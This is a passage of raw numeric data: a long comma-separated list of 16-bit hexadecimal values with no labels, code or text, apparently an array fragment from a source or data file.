0xb7fd, 0x30e9, 0x3594, 0x3342, 0x31ff, 0x3751, 0x3612, 0x27a6, 0xa474, 0x2fe4, 0x3939, 0x1db0, 0x3463, 0xa761, 0x33fc, 0xb288, 0xb2ca, 0x3157, 0xb1f3, 0x3554, 0x3495, 0xb583, 0x3140, 0xae42, 0x283a, 0xad51, 0xb4d9, 0xb4ec, 0xb4bf, 0xb12b, 0xac6a, 0x2b50, 0x2ecc, 0xaeb8, 0xb0d7, 0x2a40, 0x2c6e, 0x38bc, 0x2ed0, 0x34a0, 0xb54a, 0x301f, 0x34db, 0x36c6, 0xb7fd, 0x30e9, 0x3343, 0x2c4a, 0x3612, 0x27a6, 0x302d, 0x3508, 0x3463, 0xa761, 0x302e, 0x3013, 0xb1f3, 0x3554, 0x2d40, 0x3020, 0x283a, 0xad51, 0x3435, 0xb5c7, 0xac6a, 0x2b50, 0xa639, 0xb24a, 0x2c6e, 0x38bc, 0xb0c6, 0x2ced, 0xb0ef, 0xb505, 0x3765, 0x314f, 0xb461, 0xb2e7, 0xa2ff, 0x3708, 0xb2f1, 0xb1bd, 0xb848, 0xb062, 0x3420, 0x36b3, 0xb19b, 0xb30f, 0x3274, 0x2099, 0xa11f, 0xaeec, 0x31ff, 0x3751, 0x2e86, 0xb400, 0x3939, 0x1db0, 0xadff, 0xa93a, 0xb2ca, 0x3157, 0x3418, 0xb096, 0x3140, 0xae42, 0x3178, 0x322c, 0xb4bf, 0xb12b, 0xb049, 0xa846, 0xb0d7, 0x2a40, 0x3469, 0xb18c, 0x2e59, 0xaf8f, 0xb63f, 0xb0b6, 0x3457, 0x3419, 0xb1c8, 0x38ba, 0x3677, 0xaa64, 0x2d9f, 0xb64c, 0xaf0b, 0x32a3, 0xb2c4, 0xad9e, 0x3326, 0xb2e1, 0x135c, 0xb8af, 0x3594, 0x3342, 0xb4ff, 0x34eb, 0xa474, 0x2fe4, 0xb66f, 0x184a, 0x33fc, 0xb288, 0x34bf, 0xb02d, 0x3495, 0xb583, 0xb902, 0xac20, 0xb4d9, 0xb4ec, 0x2711, 0xb1af, 0x2ecc, 0xaeb8, 0x20f7, 0xa2c2, 0x3199, 0x3538, 0xaf15, 0xa347, 0x35f8, 0xaea7, 0xb560, 0x32fe, 0x30c7, 0x2bfc, 0x34af, 0xb76c, 0x31ce, 0x2b87, 0xb4ca, 0x36aa, 0x2ed0, 0x34a0, 0xb19b, 0xb30f, 0x135c, 0xb8af, 0x3343, 0x2c4a, 0x2e86, 0xb400, 0xb66f, 0x184a, 0x302e, 0x3013, 0x3418, 0xb096, 0xb902, 0xac20, 0x3435, 0xb5c7, 0xb049, 0xa846, 0x20f7, 0xa2c2, 0xb0c6, 0x2ced, 0xb63f, 0xb0b6, 0xb560, 0x32fe, 0xa2ff, 0x3708, 0x2d9f, 0xb64c, 0xb4ca, 0x36aa, 0xa453, 0x3279, 0x3419, 0x33a9, 0xb6d9, 0xb7d4, 0xb055, 0x2e8b, 0x361d, 0xb09c, 0x3420, 0x36b3, 0x3326, 0xb2e1, 0xb7fd, 0x30e9, 0x31ff, 0x3751, 0xa474, 0x2fe4, 0x3463, 0xa761, 0xb2ca, 0x3157, 0x3495, 0xb583, 0x283a, 0xad51, 0xb4bf, 0xb12b, 0x2ecc, 0xaeb8, 0x2c6e, 0x38bc, 0x2e59, 0xaf8f, 0x35f8, 0xaea7, 0xb461, 0xb2e7, 0x3677, 0xaa64, 0x31ce, 0x2b87, 0x3549, 0xb45f, 0xac7b, 0x31de, 0x33ae, 0x377a, 0x2ce3, 0xb43e, 0x2daa, 0x358a, 0xa6b2, 0x2fc0, 0xb2c4, 0xad9e, 0x34db, 0x36c6, 0xa11f, 0xaeec, 0xb4ff, 0x34eb, 0x302d, 0x3508, 0xadff, 0xa93a, 0x34bf, 0xb02d, 0x2d40, 0x3020, 0x3178, 0x322c, 0x2711, 0xb1af, 0xa639, 0xb24a, 0x3469, 0xb18c, 0xaf15, 0xa347, 0x3765, 0x314f, 0xb1c8, 0x38ba, 0x34af, 0xb76c, 0xb848, 0xb062, 0x2f96, 0xb104, 0x3515, 0xb3b7, 0x28da, 0x303d, 0x3733, 0xb604, 0xb241, 0x33c6, 0x3861, 0x3048, 0xb54a, 0x301f, 0x3274, 0x2099, 0x3594, 0x3342, 0x3612, 0x27a6, 0x3939, 0x1db0, 0x33fc, 0xb288, 0xb1f3, 0x3554, 0x3140, 0xae42, 0xb4d9, 0xb4ec, 0xac6a, 0x2b50, 0xb0d7, 0x2a40, 0x3199, 0x3538, 0xb0ef, 0xb505, 0x3457, 0x3419, 0x30c7, 0x2bfc, 0xb2f1, 0xb1bd, 0xaf0b, 0x32a3, 0xac74, 0xa4b4, 0xb825, 0xb3d7, 0x1067, 0x3537, 0x356c, 0x3647, 0xb451, 0xb83e, 0x2ff5, 0x2c0d, 0x2ed0, 0x34a0, 0x3274, 0x2099, 0xb4ff, 0x34eb, 0x3463, 0xa761, 0x3418, 0xb096, 0xb4d9, 0xb4ec, 0xa639, 0xb24a, 0x2e59, 0xaf8f, 0xb560, 0x32fe, 0xb2f1, 0xb1bd, 0x2f96, 0xb104, 0x33ae, 0x377a, 0xb055, 0x2e8b, 0x2ff5, 0x2c0d, 0xa702, 0xb1e8, 0x26b6, 0x3564, 0x2db5, 0x2d13, 0x2fbb, 0x2554, 0xb511, 0xac8f, 0x2ac0, 0x34e9, 0x28ec, 0xb471, 0xb25d, 0xae91, 0xb824, 0xb297, 0x3420, 0x36b3, 0x135c, 0xb8af, 0x3612, 0x27a6, 0xadff, 0xa93a, 0x3495, 0xb583, 0x3435, 0xb5c7, 0xb0d7, 0x2a40, 0xaf15, 0xa347, 0xb461, 0xb2e7, 0x2d9f, 0xb64c, 0xac74, 0xa4b4, 0x28da, 0x303d, 0x2daa, 0x358a, 0x38cb, 0x31ce, 0xb76c, 0xafd0, 0x2f14, 0xb846, 0xb471, 0xaa05, 0x25b7, 0x3534, 0xa481, 0xb48e, 0x2e46, 0xb081, 0xb8b5, 0xb610, 0x38bf, 0x2b46, 0xb169, 0xa9ec, 0xb2c4, 0xad9e, 0xb7fd, 0x30e9, 0x2e86, 0xb400, 0x33fc, 0xb288, 0x2d40, 0x3020, 0xb4bf, 0xb12b, 0x20f7, 0xa2c2, 0xb0ef, 0xb505, 0xb1c8, 0x38ba, 0x31ce, 0x2b87, 0xa453, 0x3279, 0x1067, 0x3537, 0xb241, 0x33c6, 0xb404, 0x3566, 0x34dc, 0x2fb0, 0xb329, 0x2ce7, 0x32fe, 0x3786, 0x350c, 0x34e3, 0x313b, 0xb477, 0xb8a1, 0xb585, 0x3016, 0x29d2, 0x3202, 0xb412, 0x31f1, 0xb188, 0xb54a, 0x301f, 0xa11f, 0xaeec, 0xa474, 0x2fe4, 0x302e, 0x3013, 0x3140, 0xae42, 0x2711, 0xb1af, 0x2c6e, 0x38bc, 0xb63f, 0xb0b6, 0x30c7, 0x2bfc, 0xb848, 0xb062, 0xac7b, 0x31de, 0xb6d9, 0xb7d4, 0xb451, 0xb83e, 0xb8aa, 0xa663, 0xb0bb, 0x3422, 0x3971, 0x3453, 0x299c, 0x268e, 0xb631, 0x111f, 0x353c, 0x33b7, 0xb7f5, 0x3141, 0xb746, 0xa86f, 0x330f, 0x37b4, 0xb8e5, 0x2a59, 0xb19b, 0xb30f, 0x3594, 0x3342, 0x302d, 0x3508, 0xb2ca, 0x3157, 0xb902, 0xac20, 0xac6a, 0x2b50, 0x3469, 0xb18c, 0x35f8, 0xaea7, 0xa2ff, 0x3708, 0xaf0b, 0x32a3, 0x3515, 0xb3b7, 0x2ce3, 0xb43e, 0x361d, 0xb09c, 0x3655, 0xaffb, 0xa5bf, 0xb11d, 0x3465, 0xb39a, 0x299a, 0x306a, 0xa71f, 0xb00d, 0x33af, 0x2c8b, 0xb6c1, 0xad0e, 0x3752, 0x3220, 0x3303, 0x31c2, 0xb4d0, 0xa824, 0x3326, 0xb2e1, 0x3343, 0x2c4a, 0x3939, 0x1db0, 0x34bf, 0xb02d, 0x283a, 0xad51, 0xb049, 0xa846, 0x3199, 0x3538, 0x3765, 0x314f, 0x3677, 0xaa64, 0xb4ca, 0x36aa, 0xb825, 0xb3d7, 0x3733, 0xb604, 0xa6b2, 0x2fc0, 0x2a19, 0xaed8, 0xb64c, 0xb20a, 0x35ee, 0xb5cf, 0x380e, 0x2b06, 0xb3d2, 0x3275, 0xb545, 0xb6f2, 0x316c, 0xa449, 0xa89b, 0x2288, 0x2c23, 0xb365, 0xb11b, 0x2d8a, 0x34db, 0x36c6, 0x31ff, 0x3751, 0xb66f, 0x184a, 0xb1f3, 0x3554, 0x3178, 0x322c, 0x2ecc, 0xaeb8, 0xb0c6, 0x2ced, 0x3457, 0x3419, 0x34af, 0xb76c, 0x3549, 0xb45f, 0x3419, 0x33a9, 0x356c, 0x3647, 0x3861, 0x3048, 0xb593, 0xb475, 0xb371, 0x2d83, 0x3089, 0x33de, 0x2e2c, 0x2e77, 0x3333, 0x323a, 0x3740, 0x32b1, 0x32a3, 0xb581, 0xb65d, 0x373a, 0xb1e9, 0xb59f, 0xb52d, 0x307f, 0x2ed0, 0x34a0, 0x2e86, 0xb400, 0xb902, 0xac20, 0xb0c6, 0x2ced, 0x2d9f, 0xb64c, 0xb6d9, 0xb7d4, 0x2a19, 0xaed8, 0x2db5, 0x2d13, 0x313b, 0xb477, 0x3752, 0x3220, 0xb52d, 0x307f, 0x241f, 0xb5e1, 0x9ced, 0xb09e, 0x38a8, 0xb6fd, 0x2c9d, 0xb33d, 0xb4d2, 0x2445, 0xa860, 0x36e0, 0xaff3, 0x3135, 0xa345, 0x9ffe, 0x31c1, 0xb01c, 0xadb1, 0x2db8, 0xb4df, 0x2707, 0xb1ef, 0xb522, 0x3420, 0x36b3, 0xa474, 0x2fe4, 0x283a, 0xad51, 0x2e59, 0xaf8f, 0x31ce, 0x2b87, 0x2ce3, 0xb43e, 0xb593, 0xb475, 0xb471, 0xaa05, 0x353c, 0x33b7, 0xa89b, 0x2288, 0x2d7f, 0x2cd6, 0xb485, 0xb639, 0xb84a, 0xb30d, 0xae24, 0x3870, 0x380c, 0x2912, 0x3668, 0x34e1, 0xb17f, 0xb776, 0xa9cd, 0x2008, 0x3513, 0xba62, 0x2e11, 0x24a6, 0xb26b, 0xa87a, 0x323e, 0xaa98, 0x339c, 0xb71d, 0xb2c4, 0xad9e, 0x302d, 0x3508, 0x3178, 0x322c, 0xaf15, 0xa347, 0xb848, 0xb062, 0x3733, 0xb604, 0xa702, 0xb1e8, 0x32fe, 0x3786, 0x33af, 0x2c8b, 0xb65d, 0x373a, 0x3365, 0x35db, 0xb35c, 0xad38, 0x3838, 0xb42a, 0xb809, 0xb85b, 0x3482, 0xa9fc, 0x35e3, 0xb280, 0x1015, 0x364c, 0x2d5f, 0xb5d9, 0xb51c, 0x3283, 0x313e, 0xb281, 0xaccc, 0xa528, 0xac59, 0xac65, 0xb190, 0xb597, 0xb54a, 0x301f, 0x3939, 0x1db0, 0xb4d9, 0xb4ec, 0xb0ef, 0xb505, 0xaf0b, 0x32a3, 0x356c, 0x3647, 0xb76c, 0xafd0, 0x299c, 0x268e, 0xb545, 0xb6f2, 0xb25d, 0xae91, 0xad36, 0xb646, 0x1e21, 0x323b, 0xb793, 0x3200, 0xaa52, 0x3790, 0x26ac, 0xb68e, 0xa8fb, 0xb766, 0xb245, 0x365a, 0x32b2, 0x376a, 0xab7f, 0x2e83, 0x244a, 0xadd2, 0xb4b8, 0x324b, 0xacf7, 0xa422, 0x281f, 0xb76d, 0xb19b, 0xb30f, 0xb66f, 0x184a, 0x3435, 0xb5c7, 0xb63f, 0xb0b6, 0xb4ca, 0x36aa, 0xb055, 0x2e8b, 0x34dc, 0x2fb0, 0x299a, 0x306a, 0x3740, 0x32b1, 0x38bf, 0x2b46, 0x331d, 0x33d4, 0xb732, 0x2888, 0x98c1, 0x346d, 0xac19, 0x343f, 0xb47e, 0x31f9, 0xaf6d, 0xaa1d, 0xad3d, 0x32e6, 0x368d, 0x24ce, 0xb689, 0xb458, 0x2d86, 0xb17b, 0x3482, 0xaf7c, 0x3250, 0xaf43, 0x30ab, 0xa6a4, 0x3326, 0xb2e1, 0x3463, 0xa761, 0xb4bf, 0xb12b, 0x35f8, 0xaea7, 0x3549, 0xb45f, 0x2daa, 0x358a, 0xb0bb, 0x3422, 0x380e, 0x2b06, 0x2ac0, 0x34e9, 0x3202, 0xb412, 0x2f2e, 0xb511, 0x34d3, 0x341a, 0x34fb, 0xacfe, 0x2cae, 0x3855, 0x31a6, 0xb585, 0xb831, 0x2595, 0x3802, 0x320d, 0xa726, 0x2e46, 0x2833, 0x34dd, 0x2c37, 0xa654, 0xb499, 0x31ac, 0xb1e4, 0x30f5, 0xb368, 0x8af8, 0x34db, 0x36c6, 0xadff, 0xa93a, 0x2711, 0xb1af, 0x3765, 0x314f, 0x2f96, 0xb104, 0xb241, 0x33c6, 0xa5bf, 0xb11d, 0x2e2c, 0x2e77, 0x2e46, 0xb081, 0x330f, 0x37b4, 0x2e72, 0x2cd2, 0xb827, 0x338d, 0x2c50, 0xb07a, 0xb00d, 0x3443, 0x33af, 0x3242, 0x3592, 0x1cdc, 0x2dfa, 0x323e, 0x319b, 0xaccb, 0xb72f, 0xaf40, 0x30ac, 0xb881, 0xa3e8, 0x2882, 0x348a, 0x302b, 0x31f0, 0x37f7, 0x3274, 0x2099, 0x33fc, 0xb288, 0xac6a, 0x2b50, 0x3457, 0x3419, 0xac74, 0xa4b4, 0xb451, 0xb83e, 0xb64c, 0xb20a, 0x2fbb, 0x2554, 0xb8a1, 0xb585, 0x3303, 0x31c2, 0x354f, 0xb081, 0xa824, 0x390e, 0x3157, 0x2284, 0xb1d4, 0x3233, 0x32db, 0xa9d1, 0x2a26, 0xa8a8, 0xa9f1, 0x2d56, 0xa92c, 0xa1fe, 0x28a2, 0x2d7d, 0x35b7, 0xb71f, 0xb1cd, 0x32ba, 0x3162, 0x3563, 0xb4fc, 0x2cd6, 0x135c, 0xb8af, 0x302e, 0x3013, 0xb049, 0xa846, 0xb560, 0x32fe, 0xa453, 0x3279, 0x361d, 0xb09c, 0xb371, 0x2d83, 0x25b7, 0x3534, 0xb7f5, 0x3141, 0x2c23, 0xb365, 0x31f0, 0xa07e, 0xb1e1, 0x25ae, 0x2d02, 0x2ceb, 0x3172, 0x36e4, 0x3874, 0xad74, 0xb1fc, 0xb189, 0x2963, 0xae86, 0x2ea7, 0xb3b9, 0x2f55, 0xb5f0, 0xaf29, 0x289c, 0x27e8, 0xa922, 0x3443, 0xb109, 0x37ac, 0x2d27, 0xb7fd, 0x30e9, 0xb2ca, 0x3157, 0x2ecc, 0xaeb8, 0xb461, 0xb2e7, 0xac7b, 0x31de, 0xa6b2, 0x2fc0, 0x26b6, 0x3564, 0x350c, 0x34e3, 0xb6c1, 0xad0e, 0xb1e9, 0xb59f, 0x30c9, 0xb23e, 0x3517, 0x36e4, 0x2886, 0xb7cb, 0x303b, 0x32e7, 0xb357, 0x29fe, 0xb06a, 0xb7b9, 0xadd5, 0x39e0, 0x32b0, 0x36d0, 0xabc3, 0x2503, 0x2fbe, 0x3571, 0xb56e, 0x2fd1, 0x3562, 0x2e33, 0x2ff8, 0x3339, 0xa11f, 0xaeec, 0x34bf, 0xb02d, 0xa639, 0xb24a, 0xb1c8, 0x38ba, 0x3515, 0xb3b7, 0x3861, 0x3048, 0x2f14, 0xb846, 0xb631, 0x111f, 0x316c, 0xa449, 0xb824, 0xb297, 0x29f3, 0xb23b, 0xa6c5, 0x2e2b, 0x34e1, 0xa780, 0x3544, 0x2d07, 0xb0a1, 0x30b8, 0xa69d, 0xb1f9, 0xb521, 0x36b3, 0xb2b6, 0x3494, 0xb343, 0x2c89, 0xb54f, 0x34b3, 0xab81, 0xb14c, 0xad35, 0x3436, 0x3331, 0xb4f0, 0x3594, 0x3342, 0xb1f3, 0x3554, 0xb0d7, 0x2a40, 0x30c7, 0x2bfc, 0xb825, 0xb3d7, 0x2ff5, 0x2c0d, 0xb329, 0x2ce7, 0xa71f, 0xb00d, 0x32a3, 0xb581, 0xb169, 0xa9ec, 0xb48b, 0xb030, 0x3451, 0xa93e, 0x27f8, 0x2b97, 0x3353, 0x3445, 0xaecf, 0x332f, 0x2fdf, 0xac15, 0x3123, 0xada6, 0xb0e3, 0xaf7a, 0x1caf, 0x2c99, 0xb368, 0x2df9, 0xa400, 0xae99, 0xaca2, 0x31ca, 0xa013, 0x3450, 0x3343, 0x2c4a, 0x3418, 0xb096, 0x20f7, 0xa2c2, 0xa2ff, 0x3708, 0x3419, 0x33a9, 0x38cb, 0x31ce, 0x3971, 0x3453, 0xb3d2, 0x3275, 0x28ec, 0xb471, 0x31f1, 0xb188, 0x301a, 0xad51, 0xb525, 0x2d4a, 0x301e, 0xaeff, 0xb467, 0xb530, 0x3139, 0x34cb, 0xb4d6, 0xb374, 0xb651, 0xaff5, 0xb509, 0xadd0, 0xb6d9, 0xb683, 0xb53a, 0xb86d, 0xb1c3, 0xb5cb, 0x3671, 0xb378, 0xbb7f, 0x3841, 0x31ff, 0x3751, 0x3495, 0xb583, 0x2c6e, 0x38bc, 0x3677, 0xaa64, 0x33ae, 0x377a, 0xb404, 0x3566, 0x3465, 0xb39a, 0x3333, 0x323a, 0xb8b5, 0xb610, 0xb8e5, 0x2a59, 0x33bd, 0xb013, 0xad50, 0xb43d, 0x3449, 0x2eb6, 0x349b, 0xb48b, 0x33b5, 0x3038, 0xb158, 0x2cf1, 0xb600, 0x9f69, 0xb2ca, 0xa6e4, 0x2100, 0x3733, 0x293a, 0x32dc, 0xad2d, 0x3541, 0xb434, 0xabb0, 0xb5d9, 0x3299, 0xb4ff, 0x34eb, 0x2d40, 0x3020, 0x3469, 0xb18c, 0x34af, 0xb76c, 0x28da, 0x303d, 0xb8aa, 0xa663, 0x35ee, 0xb5cf, 0xb511, 0xac8f, 0x3016, 0x29d2, 0xb4d0, 0xa824, 0x363d, 0x9ff7, 0xb379, 0x3378, 0x2c0f, 0xa246, 0x35dc, 0xb55f, 0xae83, 0x276a, 0x3590, 0x380c, 0xb48e, 0xadad, 0xa706, 0xb3f8, 0xb55b, 0x9b4e, 0xb43f, 0xa29f, 0x3138, 0x2f0b, 0xb9fd, 0x116d, 0xae0d, 0x24be, 0x3612, 0x27a6, 0x3140, 0xae42, 0x3199, 0x3538, 0xb2f1, 0xb1bd, 0x1067, 0x3537, 0x3655, 0xaffb, 0x3089, 0x33de, 0xa481, 0xb48e, 0xb746, 0xa86f, 0xb11b, 0x2d8a, 0x30eb, 0x94af, 0xb079, 0xb226, 0x3466, 0xb363, 0xa9ab, 0x3657, 0x322e, 0xb40c, 0x344a, 0x3107, 0xaf03, 0xb654, 0xb466, 0xafd6, 0xad6e, 0xa865, 0xb399, 0xb42d, 0x3314, 0xac14, 0xacf8, 0xb5e6, 0xb8d3, 0x2ec6, 0x2ed0, 0x34a0, 0x33fc, 0xb288, 0x3469, 0xb18c, 0x3549, 0xb45f, 0x38cb, 0x31ce, 0x299c, 0x268e, 0x316c, 0xa449, 0x2d7f, 0x2cd6, 0xb1e1, 0x25ae, 0x3466, 0xb363, 0x33af, 0x3242, 0xb158, 0x2cf1, 0x368d, 0x24ce, 0x1caf, 0x2c99, 0xaccc, 0xa528, 0x3562, 0x2e33, 0xb01d, 0x353f, 0x96b1, 0x327b, 0x2a47, 0x2afb, 0xac45, 0xb826, 0xb21a, 0xaddb, 0xb5bf, 0xb3da, 0x2306, 0x3217, 0x3420, 0x36b3, 0x302e, 0x3013, 0x3199, 0x3538, 0x2f96, 0xb104, 0xb404, 0x3566, 0x299a, 0x306a, 0x32a3, 0xb581, 0x3365, 0x35db, 0x3517, 0x36e4, 0x38a8, 0xb6fd, 0x32db, 0xa9d1, 0x3590, 0x380c, 0xa726, 0x2e46, 0xb6d9, 0xb683, 0xb4b8, 0x324b, 0xad35, 0x3436, 0x2cfe, 0x344e, 0xabf4, 0x2e7a, 0xb323, 0xb068, 0x3160, 0xb4cf, 0xb1a4, 0xb5ab, 0x2de9, 0xb38e, 0x3469, 0x30b7, 0xb2c4, 0xad9e, 0xb2ca, 0x3157, 0xb0c6, 0x2ced, 0xac74, 0xa4b4, 0xb8aa, 0xa663, 0x380e, 0x2b06, 0x28ec, 0xb471, 0xad36, 0xb646, 0xa6c5, 0x2e2b, 0xae24, 0x3870, 0x3874, 0xad74, 0x344a, 0x3107, 0x319b, 0xaccb, 0x2100, 0x3733, 0x3482, 0xaf7c, 0xaca2, 0x31ca, 0xad36, 0x34d8, 0xb4a6, 0xb4d7, 0xb823, 0xb038, 0x34d9, 0x2bc8, 0xb05a, 0xb26c, 0xb4bf, 0x3458, 0xb20f, 0x2ea6, 0xb54a, 0x301f, 0x34bf, 0xb02d, 0x2e59, 0xaf8f, 0xa453, 0x3279, 0x3655, 0xaffb, 0x2e2c, 0x2e77, 0xb8b5, 0xb610, 0x331d, 0x33d4, 0x3451, 0xa93e, 0xb809, 0xb85b, 0xb357, 0x29fe, 0xa860, 0x36e0, 0xa92c, 0xa1fe, 0xb55b, 0x9b4e, 0xb499, 0x31ac, 0x3671, 0xb378, 0x362b, 0xad46, 0x2a9c, 0x32a2, 0xb8e0, 0xb245, 0x310b, 0xadc2, 0x25d4, 0x3580, 0x3237, 0x34a8, 0xad05, 0x321e, 0xb19b, 0xb30f, 0xb1f3, 0x3554, 0xaf15, 0xa347, 0xac7b, 0x31de, 0x2a19, 0xaed8, 0x2fbb, 0x2554, 0x3016, 0x29d2, 0x2f2e, 0xb511, 0xb525, 0x2d4a, 0xaa52, 0x3790, 0xb0a1, 0x30b8, 0xb17f, 0xb776, 0x2ea7, 0xb3b9, 0xad6e, 0xa865, 0xa3e8, 0x2882, 0xb434, 0xabb0, 0xa92d, 0xb6fe, 0x34ba, 0xb65d, 0xac5a, 0xb68e, 0x3315, 0xb4c2, 0x3159, 0xab7e, 0xb189, 0xae94, 0x310a, 0x3639, 0x3326, 0xb2e1, 0x3418, 0xb096, 0xb0ef, 0xb505, 0x3515, 0xb3b7, 0xb593, 0xb475, 0x25b7, 0x3534, 0xb746, 0xa86f, 0x2e72, 0x2cd2, 0xad50, 0xb43d, 0xac19, 0x343f, 0xaecf, 0x332f, 0x1015, 0x364c, 0x32b0, 0x36d0, 0x31c1, 0xb01c, 0xb1cd, 0x32ba, 0xb9fd, 0x116d, 0xacb4, 0xb309, 0x362e, 0xb2e4, 0x3492, 0xb7df, 0x2eb1, 0x3759, 0x341d, 0x323c, 0x2e20, 0x2e47, 0x3282, 0xb446, 0x34db, 0x36c6, 0x3495, 0xb583, 0xb63f, 0xb0b6, 0xb825, 0xb3d7, 0xa702, 0xb1e8, 0x350c, 0x34e3, 0x3752, 0x3220, 0x354f, 0xb081, 0xb379, 0x3378, 0x2cae, 0x3855, 0x3139, 0x34cb, 0xb245, 0x365a, 0xb2b6, 0x3494, 0x2e11, 0x24a6, 0x27e8, 0xa922, 0xacf8, 0xb5e6, 0xb2b0, 0xb4d0, 0x2d1a, 0x2291, 0x352b, 0xb7c6, 0x30ca, 0xb3bd, 0xb38a, 0x22ce, 0xb088, 0xac93, 0xb3c4, 0x281b, 0x3274, 0x2099, 0x2d40, 0x3020, 0x35f8, 0xaea7, 0x3419, 0x33a9, 0xb76c, 0xafd0, 0xb631, 0x111f, 0xa89b, 0x2288, 0x31f0, 0xa07e, 0xb079, 0xb226, 0xb00d, 0x3443, 0x33b5, 0x3038, 0xad3d, 0x32e6, 0xb0e3, 0xaf7a, 0x313e, 0xb281, 0xb56e, 0x2fd1, 0xb1ef, 0xb522, 0x2ae6, 0x3183, 0xb2b8, 0x2e71, 0x3301, 0xae09, 0xb439, 0x35ab, 0xb2e2, 0xa93c, 0x304a, 0x9873, 0xb273, 0x3154, 0x135c, 0xb8af, 0x3140, 0xae42, 0x3765, 0x314f, 0x33ae, 0x377a, 0x34dc, 0x2fb0, 0xa71f, 0xb00d, 0xb65d, 0x373a, 0x30c9, 0xb23e, 0x9ced, 0xb09e, 0xb1d4, 0x3233, 0xae83, 0x276a, 0x3802, 0x320d, 0xb509, 0xadd0, 0x244a, 0xadd2, 0xab81, 0xb14c, 0x339c, 0xb71d, 0xa541, 0xa45a, 0xa19a, 0xb491, 0xb110, 0x310d, 0x3033, 0x3376, 0xb200, 0x344a, 0x355d, 0xb6a3, 0xad81, 0x29f3, 0xb7fd, 0x30e9, 0xb902, 0xac20, 0x3457, 0x3419, 0x28da, 0x303d, 0xb0bb, 0x3422, 0xb3d2, 0x3275, 0xb25d, 0xae91, 0x29f3, 0xb23b, 0xb84a, 0xb30d, 0x3172, 0x36e4, 0x322e, 0xb40c, 0x2dfa, 0x323e, 0xb2ca, 0xa6e4, 0x2d86, 0xb17b, 0xa400, 0xae99, 0xb190, 0xb597, 0x3463, 0x34bd, 0x2f23, 0x3175, 0x2c87, 0x317f, 0x348a, 0x315e, 0x3067, 0x36ca, 0xb651, 0xb2d2, 0xb4c7, 0x2d3c, 0xa11f, 0xaeec, 0x283a, 0xad51, 0xb560, 0x32fe, 0x1067, 0x3537, 0xa5bf, 0xb11d, 0x3333, 0x323a, 0x38bf, 0x2b46, 0xb48b, 0xb030, 0x3838, 0xb42a, 0x303b, 0x32e7, 0xb4d2, 0x2445, 0xa9f1, 0x2d56, 0xa706, 0xb3f8, 0x2c37, 0xa654, 0xb1c3, 0xb5cb, 0x281f, 0xb76d, 0xb2a0, 0xb47b, 0x29a7, 0xb5e1, 0x25f1, 0x2959, 0x34d2, 0x3343, 0xa9a4, 0xb527, 0x3554, 0xb0a8, 0x3161, 0x30f7, 0x3594, 0x3342, 0x3178, 0x322c, 0xb461, 0xb2e7, 0xb6d9, 0xb7d4, 0xb64c, 0xb20a, 0xb511, 0xac8f, 0x3202, 0xb412, 0x301a, 0xad51, 0xb793, 0x3200, 0x3544, 0x2d07, 0x3668, 0x34e1, 0x2963, 0xae86, 0xb466, 0xafd6, 0x30ac, 0xb881, 0xad2d, 0x3541, 0x30ab, 0xa6a4, 0x3462, 0x3163, 0x3568, 0xac14, 0xb398, 0xacbb, 0xa618, 0x2ae7, 0x34b8, 0x352d, 0x221a, 0xac95, 0x3177, 0x36b6, 0x3343, 0x2c4a, 0xb4d9, 0xb4ec, 0xb1c8, 0x38ba, 0x2ce3, 0xb43e, 0xb371, 0x2d83, 0xa481, 0xb48e, 0x330f, 0x37b4, 0x33bd, 0xb013, 0x98c1, 0x346d, 0x3353, 0x3445, 0x35e3, 0xb280, 0xadd5, 0x39e0, 0xa345, 0x9ffe, 0x35b7, 0xb71f, 0x3138, 0x2f0b, 0xb368, 0x8af8, 0xa6dd, 0x3852, 0x2eaa, 0xb316, 0xab04, 0x2d01, 0x312c, 0x2d86, 0x3673, 0x31c7, 0x9ba9, 0x3702, 0x38ed, 0xac29, 0x31ff, 0x3751, 0x3435, 0xb5c7, 0x30c7, 0x2bfc, 0x3733, 0xb604, 0x26b6, 0x3564, 0x313b, 0xb477, 0x3303, 0x31c2, 0x363d, 0x9ff7, 0x34fb, 0xacfe, 0xb467, 0xb530, 0xa8fb, 0xb766, 0xb521, 0x36b3, 0x3513, 0xba62, 0xaf29, 0x289c, 0x3314, 0xac14, 0x31f0, 0x37f7, 0x33df, 0xb0f8, 0x2c67, 0xb337, 0x3668, 0x2ba6, 0xaee6, 0xb053, 0xb1d6, 0x2c11, 0x3330, 0xace4, 0xb6fb, 0xb15e, 0xb4ff, 0x34eb, 0xb4bf, 0xb12b, 0xa2ff, 0x3708, 0x356c, 0x3647, 0x2f14, 0xb846, 0x353c, 0x33b7, 0x2c23, 0xb365, 0x30eb, 0x94af, 0x2c50, 0xb07a, 0x349b, 0xb48b, 0xaf6d, 0xaa1d, 0x3123, 0xada6, 0xb51c, 0x3283, 0x2fbe, 0x3571, 0xb4df, 0x2707, 0xb4fc, 0x2cd6, 0xa5b0, 0xb1df, 0xb411, 0x2fd6, 0x3730, 0xb34a, 0x9a34, 0xb4a3, 0xa782, 0x38da, 0xb538, 0x270c, 0x2f0e, 0x2bad, 0x3612, 0x27a6, 0x2711, 0xb1af, 0x3677, 0xaa64, 0xb055, 0x2e8b, 0xb329, 0x2ce7, 0x33af, 0x2c8b, 0xb1e9, 0xb59f, 0x241f, 0xb5e1, 0x3157, 0x2284, 0x35dc, 0xb55f, 0xb831, 0x2595, 0xb651, 0xaff5, 0xab7f, 0x2e83, 0xb54f, 0x34b3, 0x323e, 0xaa98, 0x37ac, 0x2d27, 0xb47c, 0xb35e, 0x25b5, 0xac3a, 0xb3f8, 0xb26b, 0xb6e6, 0xb497, 0xa580, 0x315b, 0xb63c, 0xb2df, 0x2a70, 0xaf22, 0x2e86, 0xb400, 0xac6a, 0x2b50, 0x34af, 0xb76c, 0x2daa, 0x358a, 0x3971, 0x3453, 0xb545, 0xb6f2, 0xb824, 0xb297, 0xb485, 0xb639, 0x2d02, 0x2ceb, 0xa9ab, 0x3657, 0x3592, 0x1cdc, 0xb600, 0x9f69, 0xb689, 0xb458, 0xb368, 0x2df9, 0xac59, 0xac65, 0x2ff8, 0x3339, 0xb37c, 0x3876, 0xb1d8, 0x308f, 0xa45f, 0x3118, 0x3320, 0xac54, 0x31a5, 0xaf7c, 0xb5a3, 0x3565, 0x3132, 0x34b1, 0xa474, 0x2fe4, 0xb049, 0xa846, 0xb2f1, 0xb1bd, 0xb241, 0x33c6, 0x3465, 0xb39a, 0x3740, 0x32b1, 0xb169, 0xa9ec, 0xb35c, 0xad38, 0x2886, 0xb7cb, 0x2c9d, 0xb33d, 0x2a26, 0xa8a8, 0xb48e, 0xadad, 0x2833, 0x34dd, 0xb53a, 0xb86d, 0xacf7, 0xa422, 